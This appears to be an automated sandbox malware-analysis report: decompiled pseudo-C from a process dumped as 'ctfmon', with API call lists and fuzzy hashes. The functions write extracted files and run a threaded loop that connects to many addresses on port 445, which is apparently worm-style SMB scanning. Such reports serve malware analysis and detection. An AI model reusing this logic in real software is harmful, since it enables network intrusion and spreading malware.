                                                							if(_t192 <  *((intOrPtr*)(_t109 + 4))) {
                                                								__eflags = _t192 -  *((intOrPtr*)(_t109 + 0x10));
                                                								if(_t192 <  *((intOrPtr*)(_t109 + 0x10))) {
                                                									E0096EC60(_t109);
                                                									_t192 = _v0;
                                                								}
                                                								_t110 =  *_t235;
                                                								_push(_t243);
                                                								__eflags =  *((intOrPtr*)(_t110 + 0x10)) - _t192;
                                                								if( *((intOrPtr*)(_t110 + 0x10)) < _t192) {
                                                									do {
                                                										_t254 =  *_t235;
                                                										__eflags = _t254;
                                                										if(_t254 != 0) {
                                                											__eflags =  *(_t254 + 0x18);
                                                											if( *(_t254 + 0x18) != 0) {
                                                												_t217 =  *((intOrPtr*)(_t254 + 0x10)) + 1;
                                                												__eflags = _t217 -  *((intOrPtr*)(_t254 + 4));
                                                												if(_t217 !=  *((intOrPtr*)(_t254 + 4))) {
                                                													 *((intOrPtr*)(_t254 + 0x10)) = _t217;
                                                													 *((intOrPtr*)(_t254 + 0x14)) =  *((intOrPtr*)(_t254 + 0x14)) +  *((intOrPtr*)(_t254 + 0x48)) + 0x2e +  *((intOrPtr*)(_t254 + 0x50)) +  *((intOrPtr*)(_t254 + 0x4c));
                                                													_t37 = _t254 + 0x28; // 0x28
                                                													_t217 = _t37;
                                                													_t38 = _t254 + 0x78; // 0x78
                                                													_t158 = E0096E7C0(_t254, _t37, _t38, 0, 0);
                                                													_t192 = _v0;
                                                													_t268 = _t268 - 0x10 + 0x1c;
                                                													asm("sbb eax, eax");
                                                													_t160 =  ~_t158 + 1;
                                                													__eflags = _t160;
                                                													 *(_t254 + 0x18) = _t160;
                                                												}
                                                											}
                                                										}
                                                										_t153 =  *_t235;
                                                										__eflags =  *((intOrPtr*)(_t153 + 0x10)) - _t192;
                                                									} while ( *((intOrPtr*)(_t153 + 0x10)) < _t192);
                                                								}
                                                								E0096F4E0(_t172, _t235, _t217, _t235, _t192,  &_v832);
                                                								__eflags = _v568 & 0x00000010;
                                                								_t113 =  *_t172;
                                                								if((_v568 & 0x00000010) == 0) {
                                                									_t218 = _t172;
                                                									_t194 = _t172;
                                                									__eflags = _t113;
                                                									while(_t113 != 0) {
                                                										__eflags = _t113 - 0x2f;
                                                										if(_t113 == 0x2f) {
                                                											L46:
                                                											_t49 = _t194 + 1; // 0x965105
                                                											_t218 = _t49;
                                                										} else {
                                                											__eflags = _t113 - 0x5c;
                                                											if(_t113 == 0x5c) {
                                                												goto L46;
                                                											}
                                                										}
                                                										_t50 = _t194 + 1; // 0x996a4c
                                                										_t113 =  *_t50;
                                                										_t194 = _t194 + 1;
                                                										__eflags = _t113;
                                                									}
                                                									_t195 = _t172;
                                                									_t247 =  &_v272 - _t172;
                                                									__eflags = _t247;
                                                									do {
                                                										_t114 =  *_t195;
                                                										_t52 =  &(_t195[0]); // 0x996a4c
                                                										_t195 = _t52;
                                                										 *((char*)(_t247 + _t195 - 1)) = _t114;
                                                										__eflags = _t114;
                                                									} while (_t114 != 0);
                                                									__eflags = _t218 - _t172;
                                                									if(_t218 != _t172) {
                                                										_t116 = _t218 - _t172;
                                                										__eflags = _t116 - 0x104;
                                                										if(_t116 >= 0x104) {
                                                											E00970E90();
                                                											asm("int3");
                                                											asm("int3");
                                                											asm("int3");
                                                											_push(_t247);
                                                											_t248 = _t195;
                                                											_push(_t235);
                                                											__eflags = _t248[1] - 0xffffffff;
                                                											if(_t248[1] != 0xffffffff) {
                                                												E0096F2D0( *_t248, _t218);
                                                											}
                                                											_t236 =  *_t248;
                                                											_t248[1] = 0xffffffff;
                                                											__eflags = _t236;
                                                											if(_t236 != 0) {
                                                												__eflags =  *(_t236 + 0x7c);
                                                												if( *(_t236 + 0x7c) != 0) {
                                                													E0096F2D0(_t236, _t218);
                                                												}
                                                												_push(_t172);
                                                												_t173 =  *_t236;
                                                												__eflags = _t173;
                                                												if(_t173 != 0) {
                                                													__eflags =  *((char*)(_t173 + 0x10));
                                                													if( *((char*)(_t173 + 0x10)) != 0) {
                                                														CloseHandle( *(_t173 + 4));
                                                													}
                                                													_push(0x20);
                                                													E00970AA1(_t173);
                                                													_t268 = _t268 + 8;
                                                												}
                                                												L00975A36(_t236);
                                                											}
                                                											__eflags = 0;
                                                											 *_t248 = 0;
                                                											return 0;
                                                										} else {
                                                											 *((char*)(_t258 + _t116 - 0x108)) = 0;
                                                											_t124 = _v272;
                                                											__eflags = _t124 - 0x2f;
                                                											if(_t124 == 0x2f) {
                                                												L58:
                                                												wsprintfA( &_v532, "%s%s",  &_v272, _t218);
                                                												_t270 = _t268 + 0x10;
                                                												_t198 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												__eflags = _t124 - 0x5c;
                                                												if(_t124 == 0x5c) {
                                                													goto L58;
                                                												} else {
                                                													__eflags = _t124;
                                                													if(_t124 == 0) {
                                                														goto L57;
                                                													} else {
                                                														__eflags = _v271 - 0x3a;
                                                														if(_v271 == 0x3a) {
                                                															goto L58;
                                                														} else {
                                                															goto L57;
                                                														}
                                                													}
                                                												}
                                                											}
                                                											goto L59;
                                                										}
                                                									} else {
                                                										_v272 = _t114;
                                                										L57:
                                                										_t247 =  &(_t235[0x50]);
                                                										wsprintfA( &_v532, "%s%s%s", _t247,  &_v272, _t218);
                                                										_t270 = _t268 + 0x14;
                                                										_t198 = _t247;
                                                										L59:
                                                										E0096FB00(_t198,  &_v272); // executed
                                                										_t130 = CreateFileA( &_v532, 0x40000000, 0, 0, 2, _v568, 0); // executed
                                                										_t175 = _t130;
                                                										__eflags = _t175 - 0xffffffff;
                                                										if(_t175 != 0xffffffff) {
                                                											E0096EF10( *_t235, _t235[0x4e]); // executed
                                                											__eflags = _t235[0x4f];
                                                											if(__eflags == 0) {
                                                												_push(0x4000); // executed
                                                												_t144 = E00970AB4(_t247, __eflags); // executed
                                                												_t270 = _t270 + 4;
                                                												_t235[0x4f] = _t144;
                                                											}
                                                											_v840 = 0;
                                                											while(1) {
                                                												_t221 = _t235[0x4f];
                                                												_t133 = E0096F090( *_t235, _t235[0x4f], 0x4000,  &_v833); // executed
                                                												_t250 = _t133;
                                                												_t270 = _t270 + 8;
                                                												__eflags = _t250 - 0xffffff96;
                                                												if(_t250 == 0xffffff96) {
                                                													break;
                                                												}
                                                												__eflags = _t250;
                                                												if(__eflags < 0) {
                                                													L70:
                                                													_v840 = 0x5000000;
                                                												} else {
                                                													if(__eflags <= 0) {
                                                														L68:
                                                														__eflags = _v833;
                                                														if(_v833 != 0) {
                                                															SetFileTime(_t175,  &_v556,  &_v564,  &_v548); // executed
                                                														} else {
                                                															__eflags = _t250;
                                                															if(_t250 != 0) {
                                                																continue;
                                                															} else {
                                                																goto L70;
                                                															}
                                                														}
                                                													} else {
                                                														_t143 = WriteFile(_t175, _t235[0x4f], _t250,  &_v844, 0); // executed
                                                														__eflags = _t143;
                                                														if(_t143 == 0) {
                                                															_v840 = 0x400;
                                                														} else {
                                                															goto L68;
                                                														}
                                                													}
                                                												}
                                                												L74:
                                                												FindCloseChangeNotification(_t175); // executed
                                                												E0096F2D0( *_t235, _t221);
                                                												__eflags = _v12 ^ _t258;
                                                												_pop(_t251);
                                                												return E00970A5D(_v12 ^ _t258, _t251);
                                                												goto L87;
                                                											}
                                                											_v840 = 0x1000;
                                                											goto L74;
                                                										} else {
                                                											_pop(_t252);
                                                											__eflags = _v12 ^ _t258;
                                                											return E00970A5D(_v12 ^ _t258, _t252);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = _t113 - 0x2f;
                                                									if(_t113 == 0x2f) {
                                                										L41:
                                                										_t206 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										__eflags = _t113 - 0x5c;
                                                										if(_t113 == 0x5c) {
                                                											goto L41;
                                                										} else {
                                                											__eflags = _t113;
                                                											if(_t113 == 0) {
                                                												L40:
                                                												_t206 =  &(_t235[0x50]);
                                                											} else {
                                                												__eflags =  *((char*)(_t172 + 1)) - 0x3a;
                                                												if( *((char*)(_t172 + 1)) == 0x3a) {
                                                													goto L41;
                                                												} else {
                                                													goto L40;
                                                												}
                                                											}
                                                										}
                                                									}
                                                									E0096FB00(_t206, _t172);
                                                									_pop(_t253);
                                                									__eflags = _v12 ^ _t258;
                                                									return E00970A5D(_v12 ^ _t258, _t253);
                                                								}
                                                							} else {
                                                								__eflags = _v12 ^ _t258;
                                                								return E00970A5D(_v12 ^ _t258, _t243);
                                                							}
                                                						} else {
                                                							 *((char*)(_t256 + _t234 - 0x20c)) = 0;
                                                							E0096FB00(_t243,  &_v528);
                                                							goto L12;
                                                						}
                                                					}
                                                				}
                                                				L87:
                                                			}

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000000,?,00965104), ref: 0096FB1E
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0096FB2C
                                                • GetFileAttributesA.KERNEL32(00000000,?,?,00965104), ref: 0096FBDD
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0096FBF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AttributesCreateDirectoryFile
                                                • String ID: /LU5/
                                                • API String ID: 3401506121-937868281
                                                • Opcode ID: 1391bd0e065e506c4d51f6b219280a519d0476feb117b32588643d5ff2fa8432
                                                • Instruction ID: 66cf4ea975101f5cc6704cc2038e523089fee26980a0ccba64ded98b2cf3c994
                                                • Opcode Fuzzy Hash: 1391bd0e065e506c4d51f6b219280a519d0476feb117b32588643d5ff2fa8432
                                                • Instruction Fuzzy Hash: 2641F7365042089FCB24DF78E8B4BEDB769AF95310F1042BAE8AD97281CB715D4AD790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E00967140(void* __eflags, CHAR* _a4) {
                                                				long _v8;
                                                				void* _v12;
                                                				long _v16;
                                                				void* _t12;
                                                				void* _t13;
                                                				int _t16;
                                                				void* _t21;
                                                				void* _t22;
                                                				long _t24;
                                                				void* _t26;
                                                				void* _t29;
                                                
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t12 = E00964AC0(_t21, _t22,  &_v12,  &_v8); // executed
                                                				if(_t12 != 0) {
                                                					_t24 = _v8;
                                                					_v16 = 0;
                                                					_t13 = CreateFileA(_a4, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                                                					_t29 = _t13;
                                                					if(_t29 == 0) {
                                                						L5:
                                                						return 0; // executed
                                                					} else {
                                                						_t26 = _v12;
                                                						_t16 = WriteFile(_t29, _t26, _t24,  &_v16, 0); // executed
                                                						_push(_t29);
                                                						if(_t16 != 0) {
                                                							FindCloseChangeNotification(); // executed
                                                							LocalFree(_t26); // executed
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							goto L5;
                                                						}
                                                					}
                                                				} else {
                                                					return _t12;
                                                				}
                                                			}

                                                APIs
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 0096718D
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 009671A5
                                                • CloseHandle.KERNEL32(00000000,?,?), ref: 009671B0
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID:
                                                • API String ID: 1065093856-0
                                                • Opcode ID: ae1bd4ea3cbbdb739bcbc54a0d00daadbcdc47ad27d13edeff84661e12cfcda0
                                                • Instruction ID: 59c715e1deede9dbed1294928ea7a27b9d20deb292e25002acfa7cfe91d38e8c
                                                • Opcode Fuzzy Hash: ae1bd4ea3cbbdb739bcbc54a0d00daadbcdc47ad27d13edeff84661e12cfcda0
                                                • Instruction Fuzzy Hash: 3901C835958208BBDB209FD4AC0AFEEBB7C9B46B15F114182FD04E7240D770990597E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0096B3C0(void* __ebx, void* __esi, intOrPtr _a4) {
                                                				void* __edi;
                                                				void* _t9;
                                                				void* _t11;
                                                				intOrPtr _t19;
                                                				intOrPtr _t24;
                                                				void* _t28;
                                                
                                                				_t24 = _a4;
                                                				if(_t24 != 0) {
                                                					InterlockedIncrement(0x996a48);
                                                					_t11 = E0096B320(__ebx, _t24, _t24); // executed
                                                					_t31 = _t11;
                                                					if(_t11 != 0) {
                                                						_push(__ebx);
                                                						_push(__esi);
                                                						_t19 = E00970A6E(__esi, _t31, 0x2c);
                                                						_a4 = _t19;
                                                						E00975C70(_t19, 0x20, _t24);
                                                						_t28 = _t28 + 0x10;
                                                						 *((intOrPtr*)(_t19 + 0x20)) = 0;
                                                						 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                						 *((intOrPtr*)(_t19 + 0x28)) =  *((intOrPtr*)(_t24 + 0x28));
                                                						EnterCriticalSection(0x996a5c);
                                                						if(E00966F70(0x995b80) != 0) {
                                                							 *((intOrPtr*)( *0x995b9c +  *0x995ba0 * 4)) = _t19;
                                                							 *0x995ba0 =  *0x995ba0 + 1;
                                                						}
                                                						LeaveCriticalSection(0x996a5c);
                                                					}
                                                					_push(0x2c);
                                                					E00970AA1(_t24);
                                                					return InterlockedDecrement(0x996a48);
                                                				}
                                                				return _t9;
                                                			}










                                                APIs
                                                • InterlockedIncrement.KERNEL32(00996A48), ref: 0096B3D4
                                                  • Part of subcall function 0096B320: socket.WS2_32(00000002,00000001,00000006), ref: 0096B33A
                                                  • Part of subcall function 0096B320: inet_addr.WS2_32(?), ref: 0096B351
                                                  • Part of subcall function 0096B320: htons.WS2_32(000001BD), ref: 0096B35F
                                                  • Part of subcall function 0096B320: connect.WS2_32(00000000,?,00000010), ref: 0096B370
                                                  • Part of subcall function 0096B320: closesocket.WS2_32(00000000), ref: 0096B37C
                                                • new.LIBCMT ref: 0096B3E9
                                                • EnterCriticalSection.KERNEL32(00996A5C), ref: 0096B418
                                                • LeaveCriticalSection.KERNEL32(00996A5C), ref: 0096B445
                                                • InterlockedDecrement.KERNEL32(00996A48), ref: 0096B45D
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalInterlockedSection$DecrementEnterIncrementLeaveclosesocketconnecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 2254562651-0
                                                • Opcode ID: 4b7812362ffdbe47d037f28f4f9ede1f380c034c04184655f23b202a901375c9
                                                • Instruction ID: a99142736f00bf2f6442b7c60a767211ff9e564c7828f3e545a01d850fee5900
                                                • Opcode Fuzzy Hash: 4b7812362ffdbe47d037f28f4f9ede1f380c034c04184655f23b202a901375c9
                                                • Instruction Fuzzy Hash: C801F575240704EBDB106F58EC9AF6E3B68EFC97A9F464009FD0D5B392DB7288049B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E0097AF7A() {
                                                				int _v8;
                                                				void* __ecx;
                                                				void* _t6;
                                                				int _t7;
                                                				char* _t8;
                                                				char* _t13;
                                                				int _t17;
                                                				void* _t19;
                                                				char* _t25;
                                                				WCHAR* _t27;
                                                
                                                				_t27 = GetEnvironmentStringsW();
                                                				if(_t27 == 0) {
                                                					L7:
                                                					_t13 = 0;
                                                				} else {
                                                					_t6 = E0097AF43(_t27);
                                                					_pop(_t19);
                                                					_t17 = _t6 - _t27 >> 1;
                                                					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                					_v8 = _t7;
                                                					if(_t7 == 0) {
                                                						goto L7;
                                                					} else {
                                                						_t8 = E00977882(_t19, _t7); // executed
                                                						_t25 = _t8;
                                                						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                							_t13 = 0;
                                                						} else {
                                                							_t13 = _t25;
                                                							_t25 = 0;
                                                						}
                                                						E00977848(_t25);
                                                					}
                                                				}
                                                				if(_t27 != 0) {
                                                					FreeEnvironmentStringsW(_t27);
                                                				}
                                                				return _t13;
                                                			}














                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0097AF83
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0097AFA6
                                                  • Part of subcall function 00977882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0097AFCC
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0097AFEE
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                • String ID:
                                                • API String ID: 1794362364-0
                                                • Opcode ID: 428c80afeb50935ccdb910e705556d45a989156fbf9f8a2d8800010e6f035f74
                                                • Instruction ID: 7acaaa15b36dce6d9f02563728296bb92ecc42d2bb91b61ed58fa1e815c9dec0
                                                • Opcode Fuzzy Hash: 428c80afeb50935ccdb910e705556d45a989156fbf9f8a2d8800010e6f035f74
                                                • Instruction Fuzzy Hash: 1101A7B36196157F67211AB65C8CD7F796DDEC6FA13154129F90CC6200EF648D0292F2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0096E0D0(CHAR* __ecx, long* _a8) {
                                                				void* _v8;
                                                				void* __esi;
                                                				void* _t12;
                                                				long _t13;
                                                				void* _t15;
                                                				long _t17;
                                                				signed int _t19;
                                                				signed int _t20;
                                                				long* _t24;
                                                				void* _t27;
                                                				char* _t28;
                                                
                                                				_push(__ecx);
                                                				_t24 = _a8;
                                                				 *_t24 = 0; // executed
                                                				_t12 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                				_v8 = _t12;
                                                				if(_t12 != 0xffffffff) {
                                                					_push(_t19);
                                                					_push(_t27);
                                                					_t13 = SetFilePointer(_t12, 0, 0, 1); // executed
                                                					__eflags = _t13 - 0xffffffff;
                                                					_t20 = _t19 & 0xffffff00 | __eflags != 0x00000000;
                                                					_t28 = E00970A6E(_t27, __eflags, 0x20);
                                                					_t15 = _v8;
                                                					 *_t28 = 1;
                                                					 *((char*)(_t28 + 0x10)) = 1;
                                                					 *(_t28 + 1) = _t20;
                                                					 *(_t28 + 4) = _t15;
                                                					 *((char*)(_t28 + 8)) = 0;
                                                					 *(_t28 + 0xc) = 0;
                                                					__eflags = _t20;
                                                					if(_t20 != 0) {
                                                						_t17 = SetFilePointer(_t15, 0, 0, 1); // executed
                                                						 *(_t28 + 0xc) = _t17;
                                                					}
                                                					 *_t24 = 0;
                                                					return _t28;
                                                				} else {
                                                					 *_t24 = 0x200;
                                                					return 0;
                                                				}
                                                			}















                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000140,?,?,0096F440,00000141,FFFFFFFF,?,0096FFE1,?), ref: 0096E0F1
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000001,?,0096F440,00000141,FFFFFFFF,?,0096FFE1,?,?,00000244,35554C2F), ref: 0096E115
                                                • new.LIBCMT ref: 0096E123
                                                • SetFilePointer.KERNELBASE(FFFFFFFF,00000000,00000000,00000001), ref: 0096E153
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$Pointer$Create
                                                • String ID:
                                                • API String ID: 250661774-0
                                                • Opcode ID: 51ab48269e8bf3db568621bf7daa85ab5fa2cdff7f2b072c1dc62d5e8e3f927c
                                                • Instruction ID: bc9bc53e16c29adcf0ca5f58af3bbd381695eaf6c798e142ee27db37262fd3e0
                                                • Opcode Fuzzy Hash: 51ab48269e8bf3db568621bf7daa85ab5fa2cdff7f2b072c1dc62d5e8e3f927c
                                                • Instruction Fuzzy Hash: FD11C47169C301BBF7308F68DC0AB46BBD89B11720F208649FA98EB3C0D3F6A9448754
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0096B470() {
                                                				void* _v8;
                                                
                                                				 *0x996a48 = 0;
                                                				L1:
                                                				if( *0x996a48 < 0x40) {
                                                					_v8 = 0;
                                                					if(E0096B660( &_v8) != 1) {
                                                						CreateThread(0, 0, E0096B3C0, _v8, 0, 0); // executed
                                                						Sleep(0xa); // executed
                                                					} else {
                                                						Sleep(0x1e); // executed
                                                					}
                                                				} else {
                                                					Sleep(0x12c);
                                                				}
                                                				goto L1;
                                                			}





                                                APIs
                                                • Sleep.KERNEL32(0000012C), ref: 0096B49E
                                                • Sleep.KERNELBASE(0000001E), ref: 0096B4B8
                                                • CreateThread.KERNELBASE(00000000,00000000,0096B3C0,00000000,00000000,00000000), ref: 0096B4CC
                                                • Sleep.KERNELBASE(0000000A), ref: 0096B4D0
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Sleep$CreateThread
                                                • String ID:
                                                • API String ID: 3220764680-0
                                                • Opcode ID: 24e18c13ad9b54ae42d4fada87c52a1a9a1c3d360d03b3ee7df40061fdbed8b1
                                                • Instruction ID: 7fb2875aeadb78c9e1af2f92478d775e390fc2841d6a8ad7ae05f1a3582bf7bd
                                                • Opcode Fuzzy Hash: 24e18c13ad9b54ae42d4fada87c52a1a9a1c3d360d03b3ee7df40061fdbed8b1
                                                • Instruction Fuzzy Hash: EFF0A73159530CFBE610AF91DC42F5DBB68AB45710F214015E208B62E1ABF46984ABA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E0096FF70(void* __eflags) {
                                                				intOrPtr _v8;
                                                				char _v16;
                                                				intOrPtr* _v20;
                                                				void* __ecx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t12;
                                                				intOrPtr _t16;
                                                				intOrPtr* _t17;
                                                				void* _t20;
                                                				intOrPtr* _t28;
                                                				signed int _t35;
                                                
                                                				_push(0xffffffff);
                                                				_push(E009847B2);
                                                				_push( *[fs:0x0]);
                                                				_push(_t20);
                                                				_t12 =  *0x98f008; // 0x35554c2f
                                                				_push(_t12 ^ _t35);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t32 = _t20;
                                                				_t28 = E00970A6E(_t20, __eflags, 0x244);
                                                				_v20 = _t28;
                                                				_push(_t20);
                                                				_t21 = _t28;
                                                				 *_t28 = 0;
                                                				 *((intOrPtr*)(_t28 + 4)) = 0xffffffff;
                                                				 *((intOrPtr*)(_t28 + 0x134)) = 0xffffffff;
                                                				 *((intOrPtr*)(_t28 + 0x138)) = 0;
                                                				 *((intOrPtr*)(_t28 + 0x13c)) = 0;
                                                				_v8 = 0xffffffff;
                                                				_t16 = E0096F3D0(_t28, _t28, _t32); // executed
                                                				 *0x996a4c = _t16;
                                                				if(_t16 == 0) {
                                                					_t17 = E00970A6E(_t32, __eflags, 8);
                                                					 *_t17 = 1;
                                                					 *((intOrPtr*)(_t17 + 4)) = _t28;
                                                					 *[fs:0x0] = _v16;
                                                					return _t17;
                                                				} else {
                                                					E00970030(_t28, _t21);
                                                					 *[fs:0x0] = _v16;
                                                					return 0;
                                                				}
                                                			}
















                                                APIs
                                                • new.LIBCMT ref: 0096FF9C
                                                  • Part of subcall function 0096F3D0: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0096FFE1,?,?,00000244,35554C2F,?,?,?,35554C2F,009847B2), ref: 0096F3F7
                                                • new.LIBCMT ref: 00970007
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID: /LU5/
                                                • API String ID: 1611563598-937868281
                                                • Opcode ID: 5413829cfa6b068e4089b2e78a24f2128accfaa037b1fb17be502b8d52747a54
                                                • Instruction ID: f1a29c463061125546bbea467858a79399466ad6789448c7f7f660b221e0dff6
                                                • Opcode Fuzzy Hash: 5413829cfa6b068e4089b2e78a24f2128accfaa037b1fb17be502b8d52747a54
                                                • Instruction Fuzzy Hash: B71151B2605645EFD714DF59D806B9AF7E8FB85730F10836AE429877C0EBB56500CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0096E170(char* __ecx, long __edx, LONG* _a4) {
                                                				LONG* _t13;
                                                				LONG* _t19;
                                                
                                                				if( *__ecx == 0) {
                                                					_t13 = _a4;
                                                					if(_t13 != 0) {
                                                						if(_t13 != 1) {
                                                							if(_t13 == 2) {
                                                								 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x18)) + __edx;
                                                							}
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + __edx;
                                                							return 0;
                                                						}
                                                					} else {
                                                						 *((intOrPtr*)(__ecx + 0x1c)) = __edx;
                                                						return _t13;
                                                					}
                                                				} else {
                                                					if( *((char*)(__ecx + 1)) == 0) {
                                                						return 0x1d;
                                                					} else {
                                                						_t19 = _a4;
                                                						if(_t19 != 0) {
                                                							if(_t19 != 1) {
                                                								if(_t19 != 2) {
                                                									return 0x13;
                                                								} else {
                                                									SetFilePointer( *(__ecx + 4), __edx, 0, _t19); // executed
                                                									return 0;
                                                								}
                                                							} else {
                                                								SetFilePointer( *(__ecx + 4), __edx, 0, _t19);
                                                								return 0;
                                                							}
                                                						} else {
                                                							SetFilePointer( *(__ecx + 4),  *((intOrPtr*)(__ecx + 0xc)) + __edx, _t19, _t19); // executed
                                                							return 0;
                                                						}
                                                					}
                                                				}
                                                			}






                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0096E3D2,00000002,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E190
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,0096E3D2,00000002,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E1A6
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 8fe916858411765370dc23ed1b8e04af2c43052ef1ada80fce1ad931d0f35ce7
                                                • Instruction ID: 2acd85673fd0cc51b8b543a0d6831b442145aebbf80c95cb6b6cc9bbfdc9a7f9
                                                • Opcode Fuzzy Hash: 8fe916858411765370dc23ed1b8e04af2c43052ef1ada80fce1ad931d0f35ce7
                                                • Instruction Fuzzy Hash: D1116D7164C1046FEB20CF64EC45B363BDDEB96328F2988A9F40CC9551E233CC56AB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0096E3C0(char* __ecx, void* __eflags) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				signed int _v20;
                                                				long _v24;
                                                				long _v28;
                                                				intOrPtr _v32;
                                                				signed int _t46;
                                                				signed int _t48;
                                                				intOrPtr _t49;
                                                				long _t54;
                                                				struct _OVERLAPPED* _t55;
                                                				signed int _t58;
                                                				void* _t60;
                                                				intOrPtr _t61;
                                                				int _t63;
                                                				long _t65;
                                                				intOrPtr* _t67;
                                                				intOrPtr _t69;
                                                				intOrPtr _t78;
                                                				intOrPtr _t80;
                                                				intOrPtr _t84;
                                                				long _t87;
                                                				void* _t91;
                                                				void* _t94;
                                                				void* _t95;
                                                				void* _t96;
                                                
                                                				_t68 = __ecx;
                                                				_t67 = __ecx; // executed
                                                				_t46 = E0096E170(__ecx, 0, 2); // executed
                                                				_t95 = _t94 + 4;
                                                				if(_t46 == 0) {
                                                					if( *__ecx == 0) {
                                                						_t84 =  *((intOrPtr*)(__ecx + 0x1c));
                                                						goto L7;
                                                					} else {
                                                						if( *((char*)(__ecx + 1)) == 0) {
                                                							_t84 = 0;
                                                							_v16 = 0;
                                                							goto L8;
                                                						} else {
                                                							_t65 = SetFilePointer( *(__ecx + 4), 0, 0, 1); // executed
                                                							_t84 = _t65 -  *((intOrPtr*)(_t67 + 0xc));
                                                							L7:
                                                							_v16 = _t84;
